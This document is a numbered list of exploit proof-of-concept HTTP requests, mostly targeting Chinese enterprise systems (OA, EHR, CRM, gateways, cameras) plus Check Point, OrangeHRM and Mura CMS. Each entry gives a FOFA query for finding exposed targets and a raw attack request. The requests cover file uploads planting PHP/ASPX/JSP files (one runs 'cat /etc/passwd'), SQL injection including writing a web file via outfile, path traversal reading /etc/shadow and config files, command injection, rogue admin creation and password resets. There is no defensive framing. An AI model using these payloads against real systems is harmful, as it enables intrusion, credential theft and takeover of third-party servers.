------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"

POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"

POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"

URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"

POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. 精益 value management system (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"

GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"

GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"

POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"

GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"

POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"

POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文 engineering management system arbitrary file read

POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"

POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"

POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1


183. 广州图创 library cluster management system (Interlib) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"

GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"

POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')


185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"

POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1


188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"

GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技 (LANWON) clinical viewer deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"

GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload interface file upload

1. Run the POC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
